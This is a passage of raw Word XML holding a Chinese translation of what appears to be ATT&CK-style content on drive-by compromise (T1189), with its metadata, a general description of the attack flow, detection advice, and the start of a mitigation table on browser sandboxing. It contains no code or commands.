            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545E4BD8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期扫描对外系统是否存在漏洞并确立</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>快速</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>修复</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>步骤，以便扫描和公开披露过程中发现关键漏洞时快速打补丁。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01B0DE34" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79491886" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043ED043" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>日志监控来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看日志中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有漏洞攻击企图</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>成功的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>迹象</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。通过深度数据包检查来查看常见漏洞攻击相关行为，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用防火墙可以检测到与漏洞攻击企图</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不恰当输入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C83D07" w14:textId="6E66353B" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="0014642B" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路过式下载</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1555" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8181"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="56F74596" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34DA3991" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1189</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32DF4B9D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B649B01" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D9B4E75" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A1D90DA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>网络抓包</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>，网</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>络设备日志，网络进程使用，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>代理，网络入侵检测系统，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>SSL/TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B4AFDCD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67357A75" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A7DB16" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>网页木马</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>攻陷指的是攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>利用用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>正常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>和浏览网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获取系统访问权限。用户的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>这种技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的攻击目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C82C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>存在多种向浏览器传</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>递</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>漏洞攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>代码的方</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>法，包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3481F771" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DA7A08" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>注入某种形式恶意代码，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>iFrames</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>和跨站脚本，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>合法网站。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE7A25" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DA7A08" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA7A08">
        <w:lastRenderedPageBreak/>
        <w:t>利用合法广告提供商</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>支付和投放恶意广告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A0E450" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DA7A08" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>利用内置的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>应用接口插入某种对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>内容（例如：论坛帖子、评论以及其他用户可控制的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7A08">
        <w:t>内容）或在访问客户端上执行脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1863A91B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>攻击者通</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>常利用特定群体（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>：政府、特殊行业或地区）访问的网站，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>锁定</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>特定用户或基于共同兴趣锁定特定用户群</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来实施攻击。这种针对性攻击被称为战略性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击或水坑攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已知好几个这种</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击的例子。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425B34B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>典型的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页木马</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻陷过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400159DF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="Step"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用户访问某个</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击者控制内容的网站。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE18540" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="Step"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>脚本自动执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>通常搜索浏览器和插件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本来查看是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能存在漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC1956E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="Step"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>此过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用户启用脚本或活动网站组件并忽略警告对话框。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E8B1B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="Step"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>版本存在漏洞后，将漏洞攻击代码传递给浏览器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7B653F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="Step"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>如果漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用户系统执行攻击者代码，除非有其他保护措施。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E804F2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="Step"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>某些情况下，传递漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>代码前，攻击者需在初始扫描后第二次访问网站。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54127056" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>面向公众的应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>不同，此技术的重点是在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>访问网站时利用客户端端点上的软件。攻击者通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>此技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>内部网络上</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>系统，而不</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>太</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能是隔离区的外部系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C6476" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="608ABDD7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7356FF2C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B8821EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="738077D4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45A1D039" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>应用隔离和沙箱</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BBE02DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>用浏览器沙箱</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>缓解漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>一些影响，但可能会有沙箱逃逸。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>也可通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>其他类型的虚拟化和应用微</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分区来缓解</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>客户端漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
